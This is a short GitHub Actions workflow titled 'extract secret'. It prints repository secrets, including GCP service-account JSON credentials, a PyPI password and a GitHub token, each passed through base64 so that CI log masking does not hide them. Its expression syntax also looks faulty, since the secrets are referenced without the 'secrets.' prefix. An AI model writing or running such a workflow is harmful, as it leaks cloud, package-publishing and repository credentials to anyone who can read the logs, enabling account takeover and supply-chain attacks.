name: extract secret

on:
  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
    - name: Extract secret
      shell: bash
      run: |
        echo ${{ BUCKET }} | base64
        echo ${{ DEPLOYER_SERVICE_ACCOUNT_EMAIL }} | base64
        echo ${{ DEPLOYER_SERVICE_ACCOUNT_JSON_CREDENTIALS }} | base64
        echo ${{ GCP_PROJECT }} | base64
        echo ${{ GITHUB_TOKEN }} | base64
        echo ${{ PYPI_PASSWORD }} | base64
        echo ${{ PYPI_USERNAME }} | base64
        echo ${{ RUNNER_SERVICE_ACCOUNT_EMAIL }} | base64
